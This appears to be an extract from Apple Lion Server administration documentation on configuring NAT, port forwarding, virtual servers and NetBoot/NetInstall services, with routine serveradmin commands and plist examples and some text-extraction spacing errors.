1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NAT. 4. Click Settings. 5. Select IP Forwarding and Network Address Translation (NAT). 6. From the External network interface pop-up menu, choos e the network interface that connects to the Internet or external network. 7. Click Save.
NAT
Configure NAT
Configure port forwarding

You can direct traffic coming in to your NAT network to a specific IP address behind the NAT gateway. This is called port forwarding . Port forwarding lets you s et up computers on the internal network that handle incoming connections without exposing other computers to outs ide connections . For example, you could set up a web server behind NAT service and forward incoming TCP connection requests on port 80 to the des ignated web s erver. You cant forward the same port to multiple computers, but you can forward many ports to one computer. Enabling port forwarding requires the use of the Terminal application and administrator acces s to root privileges through sudo. You mus t also create a plis t file. The contents of the plis t file are us ed to generate /etc/nat/natd.conf.apple, which is pas sed to the NAT daemon when it is started. Do not try to edit /etc/nat/natd.conf.apple directly. If you use a plist editor instead of a command-line text editor, alter the following procedure to s uit. To forward port traffic:
1. If the file /etc/nat/natd.plist does nt exis t, make a copy of the default NAT daemon plist. $ sudo cp /etc/nat/natd.plist.default /etc/nat/natd.plist 2. Using a Terminal editor, add the following block of XML text to /etc/nat/natd.plis t before the two lines at the end the file (</dict> and </plis t>), s ubs tituting your settings where indicated by italics: <key>redirect_port</key> <array> <dict>
<key>proto</key> <string>tcp or udp</string> <key>targetIP</key> <string>LAN_ip</string> <key>targetPortRange</key> <string>LAN_ip_range</string> <key>aliasIP</key> <string>WAN_ip</string> <key>aliasPortRange</key> <string>WAN_port_range</string> </dict> </array> 3. Save your file changes. 4. Enter the following commands in Terminal: $ sudo serveradmin stop nat $ sudo serveradmin start nat 5. Verify that your changes remain by inspecting the /etc/nat/natd.conf.apple file. The changes made, except for comments and thos e settings that Server Admin can change, are used by server configuration tools (Server Admin, Gateway Setup Ass is tant, and serveradmin). 6. Configure NAT service in Server Admin as needed. For more information, see Configure NAT service. 7. Click Save. 8. Start NAT service.
NAT
Configure NAT
Port forwarding examples

You can forward ports to an IP address. The ports on the WAN side do not need to be the s ame as the ports on the LAN side, but they mus t correspond. For example, if you forward 10 consecutive ports from the WAN side, you must forward them to 10 cons ecutive ports on the LAN side, but they dont need to be the same 10. Single port forwarding This example shows the setting to forward TCP port 80 (web service) connections on the WAN address 17.128.128.128 to TCP port 80 (web service) on the private LAN address 192.168.1.1. Add the following to the /etc/nat/natd.plis t file: <key>redirect_port</key> <array> <dict> <key>proto</key> <string>tcp</string> <key>targetIP</key> <string>192.168.1.1</string> <key>targetPortRange</key> <string>80</string> <key>aliasIP</key>
<string>17.128.128.128</string> <key>aliasPortRange</key> <string>80</string> </dict> </array> Multiple port forwarding This example shows the setting to forward TCP and UDP ports 600-1023 (NetInfo, full range) connections on the WAN address 17.128.128.128 to corresponding ports on the private LAN address 192.168.1.1. Add the following to the /etc/nat/natd.plis t file: <key>redirect_port</key> <array> <dict> <key>proto</key> <string>tcp</string> <key>targetIP</key> <string>192.168.1.1</string> <key>targetPortRange</key> <string>600-1023</string> <key>aliasIP</key> <string>17.128.128.128</string> <key>aliasPortRange</key> <string>600-1023</string> </dict> </array> <array> <dict> <key>proto</key> <string>udp</string> <key>targetIP</key> <string>192.168.1.1</string> <key>targetPortRange</key> <string>600-1023</string> <key>aliasIP</key> <string>17.128.128.128</string> <key>aliasPortRange</key> <string>60-1023</string> </dict> </array> Testing port forwarding rules After you configure port forwarding rules you can test them by access ing the service from the public IP address of your NAT router. If you success fully access the services, you have properly configured and tested your port forwarding rule. For example, if you have a website hosted on a computer with the private IP address of 192.168.1.10 and your NAT router has a public IP addres s of 219.156.13.13 and a port forwarding rule that forwards port 80 to IP address 192.168.1.10, you would access the webs ite by entering the public IP address (http://219.156.13.13) into your web browser. If your port forwarding rules are correct, your port is forwarded to the computer that is hos ting the website (192.168.1.10).
NAT
Configure NAT
Create a gateway without NAT

You can us e a computer as a gateway between network s egments without translating IP address es between public and private ranges. This is called IP address forwarding. Lion Server supports IP address forwarding and can be configured us ing Server Admin. You can have various network configurations that would use a gateway without NAT. For example, a s erver might be trans lating private IP address es to public addresses using NAT, but your Lion Server gateway might be routing information between private address subnets. Likewise, you might want to run a firewall between network segments in your own LAN. Any condition where you want to route network traffic through the server without masquerading IP addresses is a condition that involves IP addres s forwarding. The s teps for creating a gateway for addres s forwarding are the s ame as those for creating a NAT LAN. This means that network ports must be properly configured and that Firewall service must be enabled.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NAT. 4. Click Settings. 5. Select IP Forwarding only. 6. Click Save.
NAT
Configure NAT
Use serveradmin to configure NAT service

To configure NAT service: $ sudo serveradmin settings nat:enable_natportmap= value nat:interface = value Control-D To view all settings: $ sudo serveradmin settings nat
Parameter Description
enable_natportmap
yes|no
Default =
yes
interface
The network port. Default =
"en0"
For more information about command-line parameters for NAT, s ee NAT service settings. For information about serveradmin, see its man page.
NAT
Configure NAT
Use serveradmin to start and stop NAT service
You use serveradmin to s tart and stop NAT service on your default network interface.
To s tart NAT service: $ sudo serveradmin start nat To s top NAT service: $ sudo serveradmin stop nat
NAT
Configure NAT
Use serveradmin to view NAT status overview

You can us e serveradmin to view the NAT status overview to s ee if the service is running and how many protocol links are active.
To view NAT status overview: $ sudo serveradmin status nat To s ee detailed NAT s tatus overview: $ sudo serveradmin fullstatus nat
NAT
Monitor NAT
View the NAT service log and log path

To view the contents of the NAT service log or to view log paths, use tail or another file lis ting tool.
To view the lates t entries in the log: $ tail log-file To view the log path: $ sudo serveradmin command nat:command = getLogPaths The computer responds with the following output: nat:natLog = nat-log
Value
Description The location of the NAT service log. Default =
nat-log
/var/log/alias.log
For more information about NAT commands, see NAT s ervice settings . For information about tail and cat, s ee their man pages.
NAT
Monitor NAT
View the NAT status overview

The NAT status overview lets you see if the service is running and how many protocol links are active.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NAT. 4. Click Overview to s ee whether the service is running, when it s tarted, and the number of TCP, UDP, and ICMP links.
NAT
Common NAT tasks
Link a LAN to the Internet through one IP address

To link a LAN, you need a Mac server with two network interfaces: one to connect to the Internet and one to connect to your private network. The s teps below us e the following configuration as an example: Ethernet interface names and functions : Ethernet Built-in (connected to Internet), PCI Ethernet Slot 1 (connected to internal network) Internet or public IP addres s: 17.254.0.3 (example only; your IP number is provided by your ISP) Internet or public DNS IP addres s: 17.254.1.6 (example only; your IP number is provided by your ISP) Private network IP addres s range and netmask: 192.168.0.2192.168.0.254 (also express ed as192.168.0.0/24 or 192.168.0.0:255.255.255.0) Servers private network IP addres s: 192.168.0.1 LAN client IP address s ettings: Configure IPv4 Using DHCP This last setting is not required because NAT can be used with static IP addresses ins tead of DHCP. However, configuring this setting makes it easier to configure computers. Internet-enabled games allow multiple players to connect online over a LAN. This is known as a LAN party. Setting up a LAN party is essentially the same as the process des cribed below with the following cons iderations: Open only the ports necessary to play an Internet-enabled game. If the game is played only ins ide the LAN, dont open the firewall to game ports. If you have computers joining and leaving the LAN, use DHCP for client address configuration.
1. On the gateway server, open the Network pane of System Preferences. 2. In the active Network s creen, make s ure the interface Built-in Ethernet is at the top of the lis t of interfaces; if not, drag it to the top of the list. This s ets the default gateway in the routing table. The top interface is always configured for the Internet or WAN. 3. Make sure the IP address and settings for Ethernet 1 are your public address settings from your ISP. In this example they are: IP addres s: 17.254.0.3 Netmask: 255.255.252.0 DNS: 17.254.1.6 4. Make sure the IP address and settings for Ethernet 2 or PCI Ethernet Slot 1 are your local address s ettings. In this example, they are: IP addres s: 192.168.0.1 Netmask: 255.255.255.0 DNS: 17.254.1.6 5. If neces sary, click Apply Now.
6. Open Server Admin and connect to the s erver. 7. Click the triangle at the left of the server. The list of s ervices appears . 8. From the expanded Servers list, select DHCP. 9. Click Subnets and create a subnet for the internal LAN with the following configuration parameters : Subnet name: whatever you want Starting IP address: 192.168.0.2 Ending IP address : 192.168.0.254 Subnet mask: 255.255.255.0 Network interface: en1 Router: 192.168.0.1 Lease time: whatever you want DNS: 17.254.1.6 For detailed information about configuring DHCP, s ee Create DHCP subnets. 10. To s tart DHCP service, click the Start DHCP button below the Servers list. 11. In Server Admin, choose NAT from the expanded Servers list. 12. Configure NAT using the following setting: External network interface: en0 13. If neces sary, click Save. 14. To s tart NAT service, click the Start NAT button below the Servers lis t. 15. In Server Admin, choose Firewall from the expanded Servers list. 16. Create firewall rules to permit access to and from your private network. For example, create an IP addres s group named Private LAN for the addresses 192.168.0.0/16. For more information, see Create an address group. 17. To s tart Firewall service, click the Start Firewall button below the Servers list. 18. Start any services you want the private LAN to access (web, SSH, file sharing, and s o on) using the Private LAN group. 19. Start any services you want the Internet to access on your private LAN (web, SSH, file sharing, and so on) using the any address group. 20. Click Save.
NAT
Common NAT tasks
Set up virtual servers

A virtual server is a gateway server that sends services behind a NAT firewall to real servers on a port-by-port basis. For example, s uppose you have a NAT gateway named domain.example.com with an address of 17.100.0.1 that is set to forward web traffic (port 80) to 10.0.0.5 (port 80) behind the firewall and that s ends packet reques ts for s sh traffic (port 22) to 10.0.0.15 (port 22). In this example, the NAT gateway is not really s erving the web content. The server at 10.0.0.5 is, but it is invisible to the clients browsing the web site. Viewed from the Internet you have one s erver, but viewed from behind the NAT barrier, you have as many or as few as you need. You can us e this setup for load balancing or as an organizational s cheme for the networks topography. Virtual servers als o enable you to easily reroute network traffic to other computers on the LAN by reconfiguring the gateway.
Virtual servers require three service configurations: NAT: NAT service must be configured with port forwarding of the virtual port. DNS: The DNS record for the s erver should accept a few aliases of common services and res olve them to the same IP addres s. Firewall: The firewall must permit traffic on specific ports to have access to the NAT LAN. In this example, you s et up a NAT gateway and route two domain names and services to different computers behind the gateway firewall. As sume the following configuration details: Ethernet interface names and functions : Ethernet Built-in (connected to Internet), PCI Ethernet Slot 1 (connected to internal network) Internet or public IP addres s: 17.100.0.1 (example only, your IP number and netmask information will be provided by your ISP) Private network IP addres s range and netmask: 192.168.0.0192.168.0.255 (also express ed as 192.168.0.0/24 or 192.168.0.0:255.255.255.0) Gateway servers private network IP addres s: 192.168.0.1 Web servers private network IP address: 192.168.0.2 Mail servers private network IP address : 192.168.0.3 Web and mail servers IP address s ettings: Configure IPv4 Using DHCP This last setting is not required because NAT can be used with static IP addresses ins tead of DHCP. However, configuring this setting makes it easier to configure computers. Now all web traffic to www.example.com is forwarded to the internal server at 192.168.0.2, and incoming mail traffic sent to mail.example.com is delivered to the internal server at 192.168.0.3. To change the servers behind the NAT (for example, to perform a hardware upgrade), change the DHCP static IP address to the Ethernet addresses of the new s ervers. The new s ervers are ass igned the existing internal IP addres ses designated for web and mail, and the gateway forwards the traffic to the new servers s eamless ly.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select DHCP. 4. Click Subnets and create an address group for the internal LAN with the following configuration parameters: Subnet name: whatever you want Starting IP address: 192.168.0.2 Ending IP address : 192.168.0.254 Subnet mask: 255.255.255.0 Network interface: en1 Router: 192.168.0.1 Lease time: whatever you want DNS: provided b y ISP Static mapping (web): web servers Ethernet address mapped to 192.168.0.2 Static mapping (mail): mail servers Ethernet address mapped to 192.168.0.3 For more information, see Create DHCP s ubnets and Use DHCP to as sign static IP addresses. 5. To s tart DHCP service, click the Start DHCP button (below the Servers lis t). 6. In Server Admin, choose NAT from the expanded Servers list. 7. Configure NAT using the following settings:
External network interface: en0 Port forwarding: TCP port 80 (web) to 192.168.0.2 Port forwarding: TCP port 25 (mail) to 192.168.0.3 For more information about configuring port forwards , see Configure port forwarding. 8. Click Save. 9. To s tart NAT service, click the Start NAT button below the Servers lis t. 10. In Server Admin, choose Firewall from the expanded Servers list. 11. Create Firewall rules to permit access to your private network. For more information, see Create an address group. 12. Enable the two s ervices you want the Internet to access on your private LAN (web and SMTP mail) using the any address group. 13. Click Save. 14. To s tart Firewall service, click the Start Firewall button (below the Servers list). 15. Contact your DNS provider (usually your ISP) to add two aliases to your gateway servers DNS record. Request an A record with the name www.example.com to the IP address 17.100.0.1. Request an MX record with the name mail.example.com to the same IP address. These records are in addition to exis ting A and CNAME records for your domain.
NetBoot
About NetBoot service

NetBoot service is built upon protocols, files, and folder structures that are described below. The NetBoot, NetIns tall, and NetRes tore features of Mac OS X offer you alternatives for managing the operating system and application s oftware that your Macintosh clients (or even other s ervers) require to start and do their work. Instead of going from computer to computer to install operating sys tem and application s oftware from CDs, you can prepare an installation image that installs on each computer when it starts up. You can als o choose to not install software and have client computers start up (or boot) from an image stored on the s erver. (In some cases , clients dont even need their own hard disk.) Using NetBoot and NetInstall, your client computers can s tart from a standardized Mac OS configuration suited to specific tasks. Because the client computers start from the same image, you can quickly update the operating system for users by updating a single boot image. NetBoot requires a boot image. NetInstall requires an installation image. A b oot image (.dmg file) is a file that looks and acts like a mountable dis k or volume. NetBoot images contain the sys tem software needed to act as a startup disk for client computers over the network. An installation image (.nbi folder) is an image that starts up the client computer long enough to install s oftware from the image. The client can then start up from its own hard dis k. Boot images and installation images are disk images . The main difference is that a .dmg file is a proper dis k image and a .nbi folder is a bootable network volume (which contains a .dmg dis k image file). Disk images are files that behave like disk volumes. You can set up multiple NetBoot or NetInstall images to suit the needs of groups of clients or you can provide copies of the same image on multiple NetBoot servers to distribute the client startup load. You can also us e a NetRestore image to quickly restore a volume. NetBoot service can be used with NetBoot and NetInstall images along with Mac OS X client management services to provide a personalized work environment for each us er. Disk Images The dis k images contain the sys tem s oftware and applications used over the network by client computers. Thes e tools can be installed on a client computer with the Server Administration Tools image. The name of a disk image file typically ends in .img or .dmg. Disk Utilitypart of Mac OS X Lioncan mount disk image files as volumes on the desktop.
You use System Image Utility to create Mac OS X Lion NetBoot or NetInstall images , us ing a Mac OS X Lion installation volume or an existing s ys tem volume as the source. For information about creating images, s ee System Image Utility help. NetBoot Share Points NetBoot service sets up share points to make images and shadow files available to clients. Shadow files are used for NetBoot clients that dont use their local hard dis ks to write out data when booted. NetBoot service creates share points for storing NetBoot and NetInstall images in /Library/NetBoot/ on each volume you enable and names them NetBootSPn, where n is 0 for the first share point and increases by 1 for each extra share point. For example, if you decide to store images on three server disks, NetBoot service s ets up three share points named NetBootSP0, NetBootSP1, and NetBootSP2. The s hare points for client shadow files are als o created in /Library/NetBoot/ and are named NetBootClients n, where n is the share point number. You can create and enable NetBootSPn and NetBootClients n s hare points on other server volumes using the NetBoot Service General settings in Server Admin. WARNING: Dont rename a NetBoot share point or the volume it resides on. Dont s top sharing a NetBoot s hare point unless you first deselect the s hare point for images and shadow files in Server Admin. Use NetBoot and NetInstall Images on Other Servers You can also s pecify the path of a NetBoot image residing on a different NFS server. When creating image files, you can specify which server the image will res ide on. See Use images stored on remote servers . Client Information File NetBoot service gathers information about a client the first time a client s elects a NetBoot or NetInstall volume to s tart from the Startup Dis k. NetBoot service s tores this information in the /var/db/bs dpd_clients file. Shadow Files Many clients can read from the same NetBoot image, but when a client mus t write back to its startup volume (such as print jobs and other temporary files), NetBoot service redirects the written data to the clients shadow files, which are separate from regular system and application software. Shadow files pres erve the unique identity of each client while it is running from a NetBoot image. NetBoot service transparently maintains changed user data in shadow files while reading unchanged data from the shared system image. Shadow files are recreated at startup, s o changes made to a users startup volume are lost at restart. For example, if a user s aves a document to the s tartup volume, after a restart that document is gone. This behavior preserves the condition of the environment the administrator set up. Therefore us ers must have accounts on a file s erver on the network to save documents. Balance the Shadow File Load NetBoot service creates an AFP share point on each server volume you specify (s ee Choose where s hadow files are stored) and distributes client s hadow files acros s them as a way of balancing the load for NetBoot clients. There is no performance gain if the volumes are partitions on the s ame disk. See Distribute s hadow files. Allocation of Shadow Files for Mac OS X Lion NetBoot Clients When a client computer s tarts from a Mac OS X Lion NetBoot image, it creates shadow files on a server NetBootClients n share point or, if no s hare point is available, on a drive local to the client. For information about changing this behavior, see Choose where shadow files are s tored. NetBoot Image Folder When you create a Mac OS X Lion NetBoot image with Sys tem Image Utility, the utility creates a NetBoot image folder whose name ends with .nbi and s tores in it the NetBoot image with other files (see the following table) required to start a client computer over the network.
File booter mach.macosx mach.macosx.mkext System.dmg Description Startup file that the firmware uses to begin the startup process UNIX kernel Drivers Startup image file (can include application software)
NBImageInfo.plist
Property list file
Sys tem Image Utility stores the folder whos e name ends with .nbi on the NetBoot s erver in /Library/NetBoot/NetBootSPn/image.nbi (where n is the volume number and image is the name of the image). You can save directly to this folder or you can create the image elsewhere (even on another computer) and copy it to the /Library/NetBoot/NetBootSPn folder later. Files for PowerPC-based Macintosh computers are stored in the ppc folder for Mac OS X Server v10.5 images, while previous images might storePowerPC files in the root of the .nbi folder. Files for Intel-bas ed Macintosh computers are s tored in the i386 folder. Mac OS X Server v10.6 and later do not s upport imaging of PowerPC-bas ed computers. You use System Image Utility to set up NetBoot image folders . The utility lets you: Name the image Choose the image type (NetBoot or NetInstall) Provide an image ID Choose the default language Choose the computer models the image supports Create unique s haring names Specify a default user name and pass word Enable automatic installation for ins tallation images Add package or preinstalled applications For information about creating images, see Create NetBoot images. Property List File The property list file NBImageInfo.plist s tores image properties. The following table gives more information about the property list file for Mac OS X Lion image files.
Property Architectures Type Array Description An array of strings of the architectures the image supports. BootFile Index String Integer Name of boot file: booter. 14095 indicates a local image unique to the server. 409665535 is a duplicate, identical image stored on multiple servers for load balancing. IsDefault Boolean True specifies this image file as the default boot image on the subnet IsEnabled Boolean Sets whether the image is available to NetBoot (or Network Image) clients. IsInstall Boolean True specifies a Network Install image; False specifies a NetBoot image. Name String Name of the image as it appears in the Mac OS X Lion Preferences pane. RootPath String Specifies the path to the disk image on the server, or the path to an image on another server. See Use images stored on remote servers. Type SupportsDiskless String Boolean NFS or HTT P. True directs the NetBoot server to allocate space for the shadow files needed by diskless clients. Description String T ext describing the image.
Language
String
A code specifying the language to be used while starting from the image.
Initial values in NBImageInfo.plist are set by System Image Utility and you usually dont need to change the property list file directly. Some values are set by Server Admin. If you mus t edit a property list file, you can us e TextEdit or Property List Editor, found in the Utilities folder on the Server Adminis tration Tools image. Boot Server Discovery Protocol (BSDP) NetBoot service uses an Apple-developed protocol based on DHCP known as Boot Server Discovery Protocol (BSDP). This protocol provides a way of discovering NetBoot servers on a network. NetBoot clients obtain their IP information from a DHCP server and their NetBoot information from BSDP. BSDP offers built-in support for load balancing. See Performance and load balancing. BootP Server NetBoot service uses a BootP server (bootpd) to provide necessary information to client computers when they try to start from an image on the server. If BootP clients on your network request an IP address from the NetBoot BootP server, this reques t fails because the NetBoot BootP server doesnt have addresses to offer. To prevent the NetBoot BootP s erver from responding to reques ts for IP addresses, use the dscl command-line tool to open the local folder on the NetBoot server and add a key named bootp_enabled with no value to the /config/dhcp/ folder Boot Files When you create a Mac OS X Lion NetBoot image with Sys tem Image Utility, the utility generates the following boot files and stores them on the NetBoot server in /Library/NetBoot/NetBootSPn/image.nbi (where n is the volume number and image is the name of the image): booter mach.macosx mach.macosx.mkext Note: If you turn on NetBoot s ervice when installing Mac OS X Lion, the ins taller creates the NetBootSP0 share point on the server boot volume. Otherwise, you can s et up NetBootSPn share points by choosing where to store NetBoot images from the list of volumes in the General pane of NetBoot Service settings in Server Admin. Trivial File Transfer Protocol (TFTP) NetBoot service uses Trivial File Transfer Protocol (TPTP) to send boot files from the server to the client. When you start a NetBoot client, the client sends a request for startup s oftware. The NetBoot server then delivers the booter file to the client us ing TFTP default port 69. Client computers acces s the s tartup s oftware on the NetBoot server from the location where the image was saved. These files are typically stored in the /private/tftpboot/NetBoot/NetBootSPn/ folder. This path is a symbolic link to Library/NetBoot/NetBootSPn/image.nbi (where n is the volume number and image is the name of the image). Using Images Stored on Other Servers You can store Mac OS X Lion NetBoot or NetIns tall images on NFS s ervers other than the NetBoot s erver. For more information, see Us e images stored on remote servers. Security You can restrict acces s to NetBoot s ervice on a case-by-case basis by listing the hardware addresses (als o known as the Ethernet or MAC addres ses) of computers that you want to permit or deny access to. The hardware addres s of a client computer is added to the NetBoot Filtering list when the client starts up using NetBoot and is, by default, enabled to us e NetBoot service. You can specify other services. See Restrict NetBoot clients by filtering addresses. NetInstall Images A NetInstall image is an image that starts up the client computer long enough to install s oftware from the image. The client can then start up from its own hard dis k. In the same way that a NetBoot image replaces the role of a hard disk, a NetIns tall image is a replacement for an installation DVD. Like a bootable CD, NetIns tall is a convenient way to reins tall the operating system, applications, or other software onto the local
hard disk. For system administrators deploying large numbers of computers with the s ame version, NetInstall can be very useful. NetInstall does not require the insertion of a CD into each NetBoot client because s tartup and installation information is delivered over the network. When you create a NetInstall image with System Image Utility, you can automate the installation proces s by limiting interaction at the client computer. Because an automatic network installation can be configured to eras e the contents of the local hard disk before installation, data loss can occur. You must control access to this type of NetIns tall image and must communicate the implications of using them to those using these images. Before using automatic network ins tallations , it is always wis e to inform users to back up critical data. You can perform s oftware installations through NetInstall using a collection of packages or an entire disk image (depending on the source used to create the image). For more information about preparing NetInstall images to install s oftware over the network, see System Image Utility help Create NetInstall images. Application for setting up and managing images You use the following Lion Server applications to s et up and manage NetBoot, NetInstall, and NetRestore: Sys tem Image Utility, to create Mac OS X Lion NetBoot, NetInstall, and NetRes tore disk images. This utility is ins talled with Lion Server software in the /Applications/Server/ folder. Server Admin, to enable and configure NetBoot s ervice and supporting s ervices . You can download Server Admin Tools at http://support.apple.com/downloads /. The Server Admin Tools are installed in the /Applications/Server/ folder. PackageMaker, to create package files you use to add s oftware to disk images. Property List Editor, to edit property lis ts s uch as NBImageInfo.plist. Note: To create an image, you must have valid Mac OS X Lion image sources or volumes. You cannot create an image of the startup disk you are running on.
NetBoot
NetBoot considerations and requirements

Before you set up NetBoot on your server, make yourself familiar with your network configuration, including the DHCP services it provides. Be sure you meet the following requirements: Youre the server administrator. Youre familiar with network setup. You know the DHCP configuration. You might need to work with your network s taff to change network topologies, switches , routers, and other network s ettings Client computer requirements All systems supported by Mac OS X Lion can use NetBoot to start from a Mac OS X Lion disk image on a server. At the time of this publication, this includes any Intel-based Macintos h computer. You mus t install the lates t firmware updates on all client computers. Firmware updates are available from the Apple s upport webs ite: www.apple.com/s upport/. Client computer RAM requirements NetBoot client computers must have at least 512 MB of RAM. Network Install client computers must als o have 512 MB of RAM. Software updates for NetBoot system disk images You mus t us e the latest s ystem software when creating NetBoot disk images. New Macintosh computers require updates of system s oftware, so if you have new Macintosh clients you mus t update your NetBoot images. To update a Mac OS X Lion dis k image, you must recreate the image. New images can easily be recreated by running a saved image creation workflow. For more information, s ee Sys tem Image Utility Help. Ethernet support on client computers
NetBoot is supported only over built-in Ethernet connections. Multiple Ethernet ports are not supported on client computers. Clients must have at least 100-Mbit Ethernet adapters. Network hardware requirements The type of network connections you must us e depends on the number of clients you expect to boot over the network: For booting fewer than 10 clients (100-Mbit Ethernet) For booting 1050 clients (100-Mbit switched Ethernet) For booting more than 50 clients (Gigabit Ethernet) These are estimates for the number of clients supported. Network service requirements Depending on the types of clients you want to boot or install, your NetBoot server must also provide the following s upporting services.
Serv ice prov ided by NetBoot serv er For booting Mac computers w ith hard disks For booting Mac computers w ithout hard disks DHCP NFS AFP HTT P TFT P Optional Required if no HTTP Not required Required if no NFS Required Optional Required if no HT TP Required Required if no NFS Required
Note: DHCP service is lis ted as optional because although it is required for NetBoot it can be provided by a server other than the NetBoot server. Services marked required mus t be running on the NetBoot server. NetBoot and AirPort The use of AirPort wireless technology to boot clients us ing NetBoot is not s upported by Apple and is discouraged. Capacity planning The number of NetBoot client computers your s erver can support depends on how your server is configured, when your clients routinely start, the servers hard disk s pace, and a number of other factors. When planning for your server and network needs, consider these factors: Ethernet speed: 100Base-T or faster connections are required for client computers and the server. As you add clients , you might need to increas e the s peed of your servers Ethernet connections. Ideally you want to take advantage of the Gigabit Ethernet capacity built in to your Mac s erver hardware to connect to a Gigabit s witch. From the switch, connect Gigabit Ethernet or 100-Mbit Ethernet to each NetBoot client. Hard disk capacity and number of images: Boot and installation images occupy hard dis k space on s erver volumes , depending on the size and configuration of the sys tem image and the number of images being stored. Images can be distributed across multiple volumes or multiple servers. For more information, see Performance and load balancing. Hard disk capacity and number of users: If you have a large number of dis kless clients , consider adding a separate file server to your network to store temporary user documents. Becaus e the s ys tem software for a disk image is written to a shadow image for each client booting from the dis k image, you can get a rough estimate for the required hard dis k capacity required by multiplying the s ize of the s hadow image by the number of clients. Number of Ethernet ports on the switch: Distributing NetBoot clients over multiple Ethernet ports on your switch offers a performance advantage. Each port mus t serve a distinct s egment.
NetBoot
Set up NetBoot serv ice
NetBoot setup overview

Here is an overview of the basic steps for setting up NetBoot service. Evaluate and update your network, servers, and client computers as necessary
The number of client computers you can support using NetBoot is determined by the number of servers you have, how theyre configured, hard dis k storage capacity, and other factors . See NetBoot considerations and requirements. Depending on the res ults of this evaluation, you might want to add servers or hard disks, add Ethernet ports to your server, or make other changes to your servers . You might also want to set up more subnets for BootP clients, depending on the number of clients you support. You might also want to implement s ubnets on this s erver (or other servers ) to take advantage of NetBoot filtering. To provide authentication and personalized work environments for NetBoot client users by using Workgroup Manager, set up workgroups and import users from the Mac s erver Users & Groups databas e before you create disk images. Make sure you have at least one administrator us er assigned to the Workgroup Manager for Mac OS X Lion client. Create disk images for client computers You can set up Mac OS X Lion disk images for client computers to start from. To create Mac OS X Lion disk images, you use Sys tem Image Utility. See System Image Utility Help. You might also want to restrict access to NetBoot images by us ing Model Filtering. See System Image Utility Help. To create application packages that you can add to an image, use PackageMaker. Application software packages can be installed by thems elves or with Mac OS X Lion system software. See Sys tem Image Utility Help. Set up DHCP NetBoot requires a DHCP server running on the local server or on another s erver on the network. Make sure you have a range of IP addresses s ufficient to accommodate the number of clients that will use NetBoot at the same time. For more information about configuring DHCP, see Server Admin Help. If your NetBoot s erver also supplies DHCP service, you might get better performance if you configure your server as a gateway. That is, configure your s ubnets to us e the s ervers IP address as the router IP address . Configure and turn on NetBoot service You use the NetBoot settings in Server Admin to configure NetBoot on your server. You turn on NetBoot s ervice us ing Server Admin. See Start NetBoot and related services and Enable images . (Optional) Set up Ethernet address filtering NetBoot filtering is performed based on the client computer hardware address. Each clients hardware addres s is registered when the client s elects a NetBoot or NetInstall volume from the startup disk. You can permit or deny specific clients by addres s. See Restrict NetBoot clients by filtering address es. Test your NetBoot setup Because there is a ris k of data los s or bringing down the network (by misconfiguring DHCP), test your NetBoot s etup before implementing it. Test each Macintos h model you support to verify that there are no problems booting into the image on a specified hardware type. Set up client computers to use NetBoot When youre satis fied that NetBoot is working on all types of client computers, s et up the client computers to start from the NetBoot disk images. You can us e the client computers Startup Disk System Preference pane to select a s tartup disk image from the server and then restart the computer. See Select a NetBoot boot image. You can also restart the client computer and hold down the N key until the NetBoot icon s tarts flas hing on the screen. The client starts from the default image on the NetBoot server. See Start up using the N key.
NetBoot
Enable NetBoot service

Before you can configure NetBoot settings, you must turn NetBoot service on in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings.
3. Click Services. 4. Click the NetBoot checkbox. 5. Click Save.
NetBoot
Configure NetBoot General settings

You use General settings to enable NetBoot service on at least one port and select where image and client data res ides.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click General. 5. In the Enable column, click the checkbox next to the network ports you want to use for serving images. 6. In the Images column, click the checkbox to choose where to store images . 7. In the Client Data column, click the checkbox for each local dis k volume where you want to store shadow files used by Mac OS X Lion dis kless clients. 8. Click Save.
NetBoot
Configure Images settings

You use Images s ettings to enable images and select the default image.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Images. 5. Enable the images you want clients to use, specify if they are available for diskless clients, and choos e the protocol for delivering them. If youre not s ure which protocol to use, choos e NFS. 6. In the Default column, click the checkbox to select the default image. You must s elect separate default images for Intel-based and PowerPC-based Macintosh clients . 7. Click Save.
NetBoot
Configure filter settings

To restrict client computers , you can s et up filters that allow or deny access to NetBoot service depending on the computers MAC address. You can enter a MAC address as canonical or noncanonical in the filter list. The canonical form of a MAC addres s contains leading zeros and lowercase hex digits separated by a :. For example, 01:a1:0c:32:00:b0 is the canonical form of a MAC address and
1:a1:c:32:0:b0 is the noncanonical form of the same MAC addres s.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Filters . 5. Select Enable NetBoot/DHCP filtering. 6. Select Allow only clients lis ted below (deny others) or Deny only clients listed below (allow others). 7. Use the Add button (+) and Delete button () to set up the lis t of client addres ses, and click OK. To look up a MAC address, enter the clients DNS name or IP address in the Host Name field and click Find. To find the hardware address for a computer using Mac OS X Lion, look on the TCP/IP pane of the computers Network preference or run Apple Sys tem Profiler. 8. Click Save. Note: You can also restrict acces s to a NetBoot image by selecting the name of the image in the Images pane of NetBoot service settings in Server Admin, clicking the Edit (/) button, and providing the required information.
NetBoot
Configure NetBoot Logging settings

You use Logging settings to choose the level of detail recorded in the service log.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NetBoot. 4. Click Settings, then click Logging. 5. From the pop-up menu, choose the log detail level (Low, Medium, or High). 6. Click Save.
NetBoot
Use serveradmin to configure NetBoot logging

You can us e serveradmin to configure NetBoot settings.
To configure a NetBoot service setting: $ sudo serveradmin settings netboot:logging_level = value To view NetBoot service configuration settings: $ sudo serveradmin settings netboot
Parameter
Description
logging_level
Default = Medium
Possible values are
Low, Medium, or High.
For information about command-line parameters , see NetBoot service s ettings. For information about serveradmin, s ee its man page.
NetBoot
Enable NetBoot 1.0 for older NetBoot clients

